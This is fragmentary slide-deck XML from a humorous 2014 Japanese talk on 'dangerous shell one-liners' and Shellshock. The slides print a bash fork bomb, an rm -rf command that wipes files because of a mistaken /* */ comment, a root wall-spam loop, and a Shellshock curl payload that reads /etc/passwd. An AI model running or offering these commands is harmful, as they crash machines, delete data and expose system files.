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73" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="276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4" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="293" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
    <p:sldId id="297" r:id="rId34"/>
    <p:sldId id="298" r:id="rId3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CC52-B3CC-9C49-9CC5-C3970F18E033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B345-125C-C24E-8CAF-69998FBAB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0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9F9F-986E-0440-9F6E-38E4F2C4A158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84213-2532-EE4B-9416-89DBA37F3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6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84213-2532-EE4B-9416-89DBA37F37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8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81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7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1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8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77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04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2014/10/19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OSC Tokyo/Fall 2014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1655-C245-0940-ADDB-4E06ABBCA83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50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amazon.co.jp/dp/B00LBPGFJS" TargetMode="External"/><Relationship Id="rId3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ueda.asia/?page_id=375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危険シェル芸勉強会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USP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>友の会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上田隆一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9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ひとつめ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52998" y="2985684"/>
            <a:ext cx="5167340" cy="138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7200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){: | : &amp;};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200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68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en-US" altLang="ja-JP" dirty="0"/>
              <a:t>:(){: | : &amp;};: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498" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>いわゆるフォーク爆弾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関数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」のプロセスがマシンに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>溢れて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再起</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不能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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>越しにホストを葬る殺傷力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53447" y="5311547"/>
            <a:ext cx="455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つまり一言で言うと・・・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812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14422" y="2276382"/>
            <a:ext cx="9500688" cy="1929971"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="28700" dirty="0" smtClean="0"/>
              <a:t>危険</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="287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8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ふたつめ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シェルスクリプトにて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5973" y="2886714"/>
            <a:ext cx="9160497" cy="98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4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> temp /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>テンポラリを削除 *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="48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80272" y="5091829"/>
            <a:ext cx="4951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/>
              <a:t>出典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0" smtClean="0"/>
              <a:t>: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>moguno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さんより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23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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> temp /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>テンポラリを削除 *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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消えるのは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> temp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/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>シェルスクリプトのコメントアウトは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="11500" dirty="0" smtClean="0"/>
              <a:t>#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53447" y="5311547"/>
            <a:ext cx="478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覚えておきたいのは・・・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898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197928" y="2281987"/>
            <a:ext cx="9500688" cy="1929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700" dirty="0" smtClean="0"/>
              <a:t>危険</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP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195839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みっつめ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3391" y="2606268"/>
            <a:ext cx="8554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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># for x in `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 10000`; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do wall '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。神だ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' ; done</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP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80272" y="5091829"/>
            <a:ext cx="5159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/>
              <a:t>出典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0" smtClean="0"/>
              <a:t>: @ryoana14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>さんより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966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# for x in `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 10000`; 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do wall '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。神だ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' ; done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144414"/>
            <a:ext cx="8229600" cy="3981749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>誰も端末使えないぞ！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すごいポンポン言う！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 descr="スクリーンショット 2014-10-16 21.5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79" y="2760878"/>
            <a:ext cx="2900346" cy="22042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406625" y="5479832"/>
            <a:ext cx="173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即ち・・・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833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9480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28700" dirty="0" smtClean="0"/>
              <a:t>迷惑</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="287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4155" y="5479832"/>
            <a:ext cx="176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アーンド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58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-214422" y="2276382"/>
            <a:ext cx="9500688" cy="1929971"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="28700" dirty="0" smtClean="0"/>
              <a:t>危険</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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7136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437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みなさん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OSC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>お疲れさまでした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5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世界は危険に飢えている発言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5" descr="スクリーンショット 2014-10-16 21.3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0528"/>
            <a:ext cx="8356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9639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6600" dirty="0" smtClean="0"/>
              <a:t>そんなある日、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kumimoji="1" lang="ja-JP" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>一つのワンライナーが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lang="en-US" altLang="ja-JP" sz="6600" dirty="0" smtClean="0"/>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>に出回る</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="66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26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15969"/>
            <a:ext cx="9144000" cy="140790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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> x='() { :;}; echo vulnerable' bash -c "echo this is a test"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82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 descr="スクリーンショット 2014-10-16 22.2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970"/>
            <a:ext cx="9144000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 descr="ss_pcwoman_0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41" y="516020"/>
            <a:ext cx="4953258" cy="47878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1156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12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408337"/>
            <a:ext cx="9144000" cy="2011476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$ curl -A '() { :; }; /bin/cat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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> | /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/bin/tail -n 3' http:/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localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>index.php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" name="図 5" descr="スクリーンショット 2014-10-16 22.3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10"/>
            <a:ext cx="9144000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5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21335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あかんやろ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8" name="図 7" descr="ss_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6" y="748055"/>
            <a:ext cx="7431914" cy="44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316809"/>
            <a:ext cx="8229600" cy="214507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危険シェル芸で遊んでいたら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シェルが危険だった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315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7200" dirty="0" smtClean="0"/>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" dirty="0" smtClean="0"/>
              <a:t>後の世界</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="72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5955832" y="2497306"/>
            <a:ext cx="1252956" cy="591689"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1819360"/>
              <a:gd name="connsiteY0" fmla="*/ 429028 h 961021"/>
              <a:gd name="connsiteX1" fmla="*/ 154474 w 1819360"/>
              <a:gd name="connsiteY1" fmla="*/ 446189 h 961021"/>
              <a:gd name="connsiteX2" fmla="*/ 257457 w 1819360"/>
              <a:gd name="connsiteY2" fmla="*/ 480511 h 961021"/>
              <a:gd name="connsiteX3" fmla="*/ 446258 w 1819360"/>
              <a:gd name="connsiteY3" fmla="*/ 566316 h 961021"/>
              <a:gd name="connsiteX4" fmla="*/ 514913 w 1819360"/>
              <a:gd name="connsiteY4" fmla="*/ 634961 h 961021"/>
              <a:gd name="connsiteX5" fmla="*/ 652223 w 1819360"/>
              <a:gd name="connsiteY5" fmla="*/ 789410 h 961021"/>
              <a:gd name="connsiteX6" fmla="*/ 703715 w 1819360"/>
              <a:gd name="connsiteY6" fmla="*/ 806572 h 961021"/>
              <a:gd name="connsiteX7" fmla="*/ 720878 w 1819360"/>
              <a:gd name="connsiteY7" fmla="*/ 858055 h 961021"/>
              <a:gd name="connsiteX8" fmla="*/ 772370 w 1819360"/>
              <a:gd name="connsiteY8" fmla="*/ 909538 h 961021"/>
              <a:gd name="connsiteX9" fmla="*/ 806697 w 1819360"/>
              <a:gd name="connsiteY9" fmla="*/ 961021 h 961021"/>
              <a:gd name="connsiteX10" fmla="*/ 926844 w 1819360"/>
              <a:gd name="connsiteY10" fmla="*/ 634961 h 961021"/>
              <a:gd name="connsiteX11" fmla="*/ 1046990 w 1819360"/>
              <a:gd name="connsiteY11" fmla="*/ 514833 h 961021"/>
              <a:gd name="connsiteX12" fmla="*/ 1201464 w 1819360"/>
              <a:gd name="connsiteY12" fmla="*/ 308900 h 961021"/>
              <a:gd name="connsiteX13" fmla="*/ 1252955 w 1819360"/>
              <a:gd name="connsiteY13" fmla="*/ 274578 h 961021"/>
              <a:gd name="connsiteX14" fmla="*/ 1390266 w 1819360"/>
              <a:gd name="connsiteY14" fmla="*/ 171611 h 961021"/>
              <a:gd name="connsiteX15" fmla="*/ 1630558 w 1819360"/>
              <a:gd name="connsiteY15" fmla="*/ 68645 h 961021"/>
              <a:gd name="connsiteX16" fmla="*/ 1716377 w 1819360"/>
              <a:gd name="connsiteY16" fmla="*/ 34323 h 961021"/>
              <a:gd name="connsiteX17" fmla="*/ 1819360 w 1819360"/>
              <a:gd name="connsiteY17" fmla="*/ 0 h 96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9360" h="961021">
                <a:moveTo>
                  <a:pt x="0" y="429028"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="51491" y="434748"/>
                  <a:pt x="103672" y="436030"/>
                  <a:pt x="154474" y="446189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189955" y="453284"/>
                  <a:pt x="223451" y="468147"/>
                  <a:pt x="257457" y="480511"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346518" y="512892"/>
                  <a:pt x="356066" y="521228"/>
                  <a:pt x="446258" y="566316"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="469143" y="589198"/>
                  <a:pt x="493850" y="610392"/>
                  <a:pt x="514913" y="634961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="560708" y="688380"/>
                  <a:pt x="571046" y="762354"/>
                  <a:pt x="652223" y="789410"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="703715" y="806572"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="709436" y="823733"/>
                  <a:pt x="710843" y="843004"/>
                  <a:pt x="720878" y="858055"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734343" y="878249"/>
                  <a:pt x="756830" y="890893"/>
                  <a:pt x="772370" y="909538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="785576" y="925382"/>
                  <a:pt x="795255" y="943860"/>
                  <a:pt x="806697" y="961021"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="837196" y="849211"/>
                  <a:pt x="856048" y="731486"/>
                  <a:pt x="926844" y="634961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="960338" y="589294"/>
                  <a:pt x="1010130" y="557829"/>
                  <a:pt x="1046990" y="514833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1103753" y="448620"/>
                  <a:pt x="1139542" y="370813"/>
                  <a:pt x="1201464" y="308900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1216051" y="294316"/>
                  <a:pt x="1236272" y="286709"/>
                  <a:pt x="1252955" y="274578"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1299225" y="240932"/>
                  <a:pt x="1335991" y="189700"/>
                  <a:pt x="1390266" y="171611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1577789" y="109113"/>
                  <a:pt x="1409979" y="170434"/>
                  <a:pt x="1630558" y="68645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1658532" y="55736"/>
                  <a:pt x="1687422" y="44850"/>
                  <a:pt x="1716377" y="34323"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1750383" y="21959"/>
                  <a:pt x="1819360" y="0"/>
                  <a:pt x="1819360" y="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30034" y="2295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私の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11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4530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しかし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本日はここからが本番です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54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42255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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>自著</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が危険書物扱い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6" name="図 5" descr="シェルスクリプト_カバー最終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18" y="2012449"/>
            <a:ext cx="3240874" cy="41741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995802" y="2573296"/>
            <a:ext cx="5558563" cy="5113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124200" y="4375247"/>
            <a:ext cx="1576661" cy="69281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360032" y="4309266"/>
            <a:ext cx="659768" cy="65981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77808" y="4692603"/>
            <a:ext cx="659768" cy="65981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 rot="2239934">
            <a:off x="5247924" y="5488327"/>
            <a:ext cx="659768" cy="65981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 rot="1236320">
            <a:off x="5030148" y="5079881"/>
            <a:ext cx="659768" cy="65981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33792" y="4709295"/>
            <a:ext cx="2813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フォローしておくと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を使ってますが</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>コマンド・ファイル・パイプが</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主眼で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>どっぷりという</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>わけでもない本デス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398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498" y="264286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なぜか安否を確認される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488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なぜか原稿を依頼される（焼け太り）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危険シェル芸は危険</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>は危険</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>人生は危険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安全な方が精神的・肉体的によい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「世界は危険に飢えている」なんて言って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ごめんなさいごめんなさいごめんなさい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ごめんなさいごぬんなさい！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72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545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以上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3" name="図 2" descr="ss_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75" y="1194545"/>
            <a:ext cx="7032736" cy="50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3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" y="2319867"/>
            <a:ext cx="9008532" cy="1913465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第</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危険シェル芸勉強会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を勝手に開催</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>致します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6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危険シェル芸とは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マウスも使わず、ソースコードも残さず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/>
              <a:t>ツールを立ち上げる間もなく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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>あらゆる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破壊・迷惑・自滅行為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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端末へのコマンド入力一撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で終わらすこと。</a:t>
            </a:r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995916" y="5756831"/>
            <a:ext cx="369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err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>blog.ueda.asia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>page_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=3752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14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思い出す夏の危険シェル芸騒動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to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49" y="1417638"/>
            <a:ext cx="6998079" cy="52654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416263" y="6132595"/>
            <a:ext cx="1699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togetter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>より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2028793" y="3348584"/>
            <a:ext cx="1682413" cy="118767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4502930" y="2589791"/>
            <a:ext cx="3150402" cy="1517585"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72665"/>
              <a:gd name="adj2" fmla="val 244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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大炎上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65000PV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87586" y="4899162"/>
            <a:ext cx="841207" cy="99761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218743" y="5730247"/>
            <a:ext cx="841207" cy="99761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3331838" y="4618747"/>
            <a:ext cx="1979310" cy="667712"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -115999"/>
              <a:gd name="adj2" fmla="val 834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首謀者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1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4094525" y="5683971"/>
            <a:ext cx="1979310" cy="699784"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -150165"/>
              <a:gd name="adj2" fmla="val -71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首謀者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2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2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戦果（？）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99083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初日だけで見知らぬ方の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>マシン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>台轟沈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その他自爆者多数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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上で試したらホストマシン沈黙の報告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自分の本がサイト経由で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冊だけ売れた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フォロワーが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人減った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7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3292" y="1907691"/>
            <a:ext cx="8686800" cy="289249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本日はこの中から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特に危険なのを勉強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700" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2700" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2700" strike="sngStrike" dirty="0" smtClean="0"/>
              <a:t>ちゃんとマスターしましょう</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" strike="sngStrike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ということで</a:t>
            </a:r>
            <a:r>
